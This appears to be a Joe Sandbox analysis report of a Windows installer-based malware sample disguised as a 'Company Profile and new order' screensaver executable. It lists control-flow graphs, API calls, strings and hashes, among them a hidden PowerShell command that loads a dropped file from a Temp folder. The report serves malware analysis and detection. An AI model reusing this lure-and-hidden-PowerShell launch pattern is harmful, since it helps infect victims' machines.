                                                                                            control_flow_graph 309 403bf3-403c0b call 406915 312 403c0d-403c1d call 406468 309->312 313 403c1f-403c56 call 4063ef 309->313 322 403c79-403ca2 call 403ec9 call 405ef8 312->322 318 403c58-403c69 call 4063ef 313->318 319 403c6e-403c74 lstrcatW 313->319 318->319 319->322 327 403d34-403d3c call 405ef8 322->327 328 403ca8-403cad 322->328 334 403d4a-403d6f LoadImageW 327->334 335 403d3e-403d45 call 40655e 327->335 328->327 329 403cb3-403cdb call 4063ef 328->329 329->327 336 403cdd-403ce1 329->336 338 403df0-403df8 call 40140b 334->338 339 403d71-403da1 RegisterClassW 334->339 335->334 340 403cf3-403cff lstrlenW 336->340 341 403ce3-403cf0 call 405e1d 336->341 352 403e02-403e0d call 403ec9 338->352 353 403dfa-403dfd 338->353 342 403da7-403deb SystemParametersInfoW CreateWindowExW 339->342 343 403ebf 339->343 347 403d01-403d0f lstrcmpiW 340->347 348 403d27-403d2f call 405df0 call 406521 340->348 341->340 342->338 346 403ec1-403ec8 343->346 347->348 351 403d11-403d1b GetFileAttributesW 347->351 348->327 355 403d21-403d22 call 405e3c 351->355 356 403d1d-403d1f 351->356 362 403e13-403e2d ShowWindow call 4068a5 352->362 363 403e96-403e97 call 405679 352->363 353->346 355->348 356->348 356->355 368 403e39-403e4b GetClassInfoW 362->368 369 403e2f-403e34 call 4068a5 362->369 367 403e9c-403e9e 363->367 370 403ea0-403ea6 367->370 371 403eb8-403eba call 40140b 367->371 375 403e63-403e86 DialogBoxParamW call 40140b 368->375 376 403e4d-403e5d GetClassInfoW RegisterClassW 368->376 369->368 370->353 372 403eac-403eb3 call 40140b 370->372 371->343 372->353 380 403e8b-403e94 call 403b43 375->380 376->375 380->346
                                                                                            APIs
                                                                                              • Part of subcall function 00406915: GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                              • Part of subcall function 00406915: GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                            • lstrcatW.KERNEL32(1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe",00008001), ref: 00403C74
                                                                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,75923420), ref: 00403CF4
                                                                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,1033,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D07
                                                                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403D12
                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\nonopposable\ff4), ref: 00403D5B
                                                                                              • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403D98
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DB0
                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DE5
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403E1B
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E47
                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E54
                                                                                            • RegisterClassW.USER32(004289C0), ref: 00403E5D
                                                                                            • DialogBoxParamW.USER32(?,00000000,00403FA1,00000000), ref: 00403E7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nonopposable\ff4$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                            • API String ID: 1975747703-3474789257
                                                                                            • Opcode ID: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                            • Instruction ID: 6a74b9b34ded998ebd2751605f77428bf44f11e359ee0ac59d58ca77ea789e65
                                                                                            • Opcode Fuzzy Hash: 0ef04955f1a6976a10593322067df9edaff6e7f7a832361b73f8beed2d85b6c9
                                                                                            • Instruction Fuzzy Hash: 2C61B770200740BAD620AF669D46F2B3A7CEB84B45F81453FF941B61E2CB7D5942CB6D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 383 403082-4030d0 GetTickCount GetModuleFileNameW call 406011 386 4030d2-4030d7 383->386 387 4030dc-40310a call 406521 call 405e3c call 406521 GetFileSize 383->387 388 4032b2-4032b6 386->388 395 403110 387->395 396 4031f5-403203 call 40301e 387->396 398 403115-40312c 395->398 402 403205-403208 396->402 403 403258-40325d 396->403 400 403130-403139 call 40349e 398->400 401 40312e 398->401 409 40325f-403267 call 40301e 400->409 410 40313f-403146 400->410 401->400 405 40320a-403222 call 4034b4 call 40349e 402->405 406 40322c-403256 GlobalAlloc call 4034b4 call 4032b9 402->406 403->388 405->403 429 403224-40322a 405->429 406->403 434 403269-40327a 406->434 409->403 414 4031c2-4031c6 410->414 415 403148-40315c call 405fcc 410->415 419 4031d0-4031d6 414->419 420 4031c8-4031cf call 40301e 414->420 415->419 432 40315e-403165 415->432 425 4031e5-4031ed 419->425 426 4031d8-4031e2 call 406a02 419->426 420->419 425->398 433 4031f3 425->433 426->425 429->403 429->406 432->419 438 403167-40316e 432->438 433->396 435 403282-403287 434->435 436 40327c 434->436 439 403288-40328e 435->439 436->435 438->419 440 403170-403177 438->440 439->439 441 403290-4032ab SetFilePointer call 405fcc 439->441 440->419 442 403179-403180 440->442 446 4032b0 441->446 442->419 443 403182-4031a2 442->443 443->403 445 4031a8-4031ac 443->445 447 4031b4-4031bc 445->447 448 4031ae-4031b2 445->448 446->388 447->419 449 4031be-4031c0 447->449 448->433 448->447 449->419
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00403093
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,00000400), ref: 004030AF
                                                                                              • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                              • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 004030FB
                                                                                            • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                                                                            Strings
                                                                                            • Inst, xrefs: 00403167
                                                                                            • soft, xrefs: 00403170
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                                                                            • "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe", xrefs: 00403088
                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                                                                            • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                                                                            • Error launching installer, xrefs: 004030D2
                                                                                            • C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                                                                            • Null, xrefs: 00403179
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                            • API String ID: 2803837635-1978725425
                                                                                            • Opcode ID: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                            • Instruction ID: 0271efb430f2efbe2fca7880162b12dddab7439e54d706f300c55aed9b32fb97
                                                                                            • Opcode Fuzzy Hash: f6f149303cde104692999693530b98443d3dd0b2c967e283c98aa5a581eac7be
                                                                                            • Instruction Fuzzy Hash: 7B51C071A01304ABDB209F65DD85B9E7FACAB09316F10407BF904B62D1D7789E818B5D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 450 40655e-406567 451 406569-406578 450->451 452 40657a-406594 450->452 451->452 453 4067a4-4067aa 452->453 454 40659a-4065a6 452->454 456 4067b0-4067bd 453->456 457 4065b8-4065c5 453->457 454->453 455 4065ac-4065b3 454->455 455->453 459 4067c9-4067cc 456->459 460 4067bf-4067c4 call 406521 456->460 457->456 458 4065cb-4065d4 457->458 462 406791 458->462 463 4065da-40661d 458->463 460->459 464 406793-40679d 462->464 465 40679f-4067a2 462->465 466 406623-40662f 463->466 467 406735-406739 463->467 464->453 465->453 468 406631 466->468 469 406639-40663b 466->469 470 40673b-406742 467->470 471 40676d-406771 467->471 468->469 472 406675-406678 469->472 473 40663d-406663 call 4063ef 469->473 476 406752-40675e call 406521 470->476 477 406744-406750 call 406468 470->477 474 406781-40678f lstrlenW 471->474 475 406773-40677c call 40655e 471->475 481 40667a-406686 GetSystemDirectoryW 472->481 482 40668b-40668e 472->482 490 406669-406670 call 40655e 473->490 491 40671d-406720 473->491 474->453 475->474 486 406763-406769 476->486 477->486 487 406718-40671b 481->487 488 4066a0-4066a4 482->488 489 406690-40669c GetWindowsDirectoryW 482->489 486->474 492 40676b 486->492 487->491 493 40672d-406733 call 4067cf 487->493 488->487 494 4066a6-4066c4 488->494 489->488 490->487 491->493 496 406722-406728 lstrcatW 491->496 492->493 493->474 498 4066c6-4066cc 494->498 499 4066d8-4066f0 call 406915 494->499 496->493 504 4066d4-4066d6 498->504 507 4066f2-406705 SHGetPathFromIDListW CoTaskMemFree 499->507 508 406707-406710 499->508 504->499 505 406712-406716 504->505 505->487 507->505 507->508 508->494 508->505
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406680
                                                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406696
                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 004066F4
                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 004066FD
                                                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406728
                                                                                            • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00418EC0,00000000), ref: 00406782
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                            • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4024019347-905382516
                                                                                            • Opcode ID: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                            • Instruction ID: c1bee3e663878f3afad94de22ef935420ccf361ce06c76a1d76179cfc985cdfa
                                                                                            • Opcode Fuzzy Hash: 14c9f03641932d7153c154bb414b77852189b75d1473d82c894b9adbe9647435
                                                                                            • Instruction Fuzzy Hash: 266146B1A043019BDB205F28DD80B6B77E4AF84318F65053FF646B32D1DA7D89A18B5E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 573 401774-401799 call 402dab call 405e67 578 4017a3-4017b5 call 406521 call 405df0 lstrcatW 573->578 579 40179b-4017a1 call 406521 573->579 584 4017ba-4017bb call 4067cf 578->584 579->584 588 4017c0-4017c4 584->588 589 4017c6-4017d0 call 40687e 588->589 590 4017f7-4017fa 588->590 597 4017e2-4017f4 589->597 598 4017d2-4017e0 CompareFileTime 589->598 591 401802-40181e call 406011 590->591 592 4017fc-4017fd call 405fec 590->592 600 401820-401823 591->600 601 401892-4018bb call 4055a6 call 4032b9 591->601 592->591 597->590 598->597 602 401874-40187e call 4055a6 600->602 603 401825-401863 call 406521 * 2 call 40655e call 406521 call 405b81 600->603 613 4018c3-4018cf SetFileTime 601->613 614 4018bd-4018c1 601->614 615 401887-40188d 602->615 603->588 635 401869-40186a 603->635 617 4018d5-4018e0 CloseHandle 613->617 614->613 614->617 618 402c38 615->618 621 4018e6-4018e9 617->621 622 402c2f-402c32 617->622 623 402c3a-402c3e 618->623 625 4018eb-4018fc call 40655e lstrcatW 621->625 626 4018fe-401901 call 40655e 621->626 622->618 632 401906-4023a7 call 405b81 625->632 626->632 632->622 632->623 635->615 637 40186c-40186d 635->637 637->602
                                                                                            APIs
                                                                                            • lstrcatW.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,?,00000031), ref: 004017B5
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,00000000,00000000,powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,?,00000031), ref: 004017DA
                                                                                              • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                              • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                              • Part of subcall function 004055A6: lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                              • Part of subcall function 004055A6: SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                              • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4$Produktionsoverfrslens$powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp
                                                                                            • API String ID: 1941528284-1129404032
                                                                                            • Opcode ID: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                            • Instruction ID: 1777f765e23ed303a4c4324df0f40fc052c607b9e3f25272d24a03cacca2a4dc
                                                                                            • Opcode Fuzzy Hash: 8735ad9560c18e5a7f29f6a8244760e17f86ea249fb7e5f19f194b0f67ebe764
                                                                                            • Instruction Fuzzy Hash: 9E41A531900509BACF117BA9DD86DAF3AB5EF45328B20423FF512B10E1DB3C8A52966D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 639 4055a6-4055bb 640 4055c1-4055d2 639->640 641 405672-405676 639->641 642 4055d4-4055d8 call 40655e 640->642 643 4055dd-4055e9 lstrlenW 640->643 642->643 645 405606-40560a 643->645 646 4055eb-4055fb lstrlenW 643->646 648 405619-40561d 645->648 649 40560c-405613 SetWindowTextW 645->649 646->641 647 4055fd-405601 lstrcatW 646->647 647->645 650 405663-405665 648->650 651 40561f-405661 SendMessageW * 3 648->651 649->648 650->641 652 405667-40566a 650->652 651->650 652->641
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                            • lstrlenW.KERNEL32(004033F2,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                            • lstrcatW.KERNEL32(Completed,004033F2,004033F2,Completed,00000000,00418EC0,00000000), ref: 00405601
                                                                                            • SetWindowTextW.USER32(Completed,Completed), ref: 00405613
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                            • String ID: Completed
                                                                                            • API String ID: 2531174081-3087654605
                                                                                            • Opcode ID: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                            • Instruction ID: deb6953f75989b306d4e6df0e2073f5bc52164b7b2c012b705af3b177d86a23e
                                                                                            • Opcode Fuzzy Hash: a9fafcf7327b9621bb894f8e2d9ac48d1397335c234e36f420f2517ccdad5277
                                                                                            • Instruction Fuzzy Hash: 8F21B375900158BACB119FA5DD84ECFBF75EF45364F50803AF944B22A0C77A4A51CF68

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 653 4032b9-4032d0 654 4032d2 653->654 655 4032d9-4032e1 653->655 654->655 656 4032e3 655->656 657 4032e8-4032ed 655->657 656->657 658 4032fd-40330a call 40349e 657->658 659 4032ef-4032f8 call 4034b4 657->659 663 403310-403314 658->663 664 403455 658->664 659->658 666 40331a-40333a GetTickCount call 406a70 663->666 667 40343e-403440 663->667 665 403457-403458 664->665 668 403497-40349b 665->668 679 403494 666->679 681 403340-403348 666->681 669 403442-403445 667->669 670 403489-40348d 667->670 672 403447 669->672 673 40344a-403453 call 40349e 669->673 674 40345a-403460 670->674 675 40348f 670->675 672->673 673->664 686 403491 673->686 677 403462 674->677 678 403465-403473 call 40349e 674->678 675->679 677->678 678->664 690 403475-403481 call 4060c3 678->690 679->668 684 40334a 681->684 685 40334d-40335b call 40349e 681->685 684->685 685->664 691 403361-40336a 685->691 686->679 696 403483-403486 690->696 697 40343a-40343c 690->697 693 403370-40338d call 406a90 691->693 699 403393-4033aa GetTickCount 693->699 700 403436-403438 693->700 696->670 697->665 701 4033f5-4033f7 699->701 702 4033ac-4033b4 699->702 700->665 705 4033f9-4033fd 701->705 706 40342a-40342e 701->706 703 4033b6-4033ba 702->703 704 4033bc-4033ed MulDiv wsprintfW call 4055a6 702->704 703->701 703->704 713 4033f2 704->713 709 403412-403418 705->709 710 4033ff-403404 call 4060c3 705->710 706->681 707 403434 706->707 707->679 712 40341e-403422 709->712 714 403409-40340b 710->714 712->693 715 403428 712->715 713->701 714->697 716 40340d-403410 714->716 715->679 716->712
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
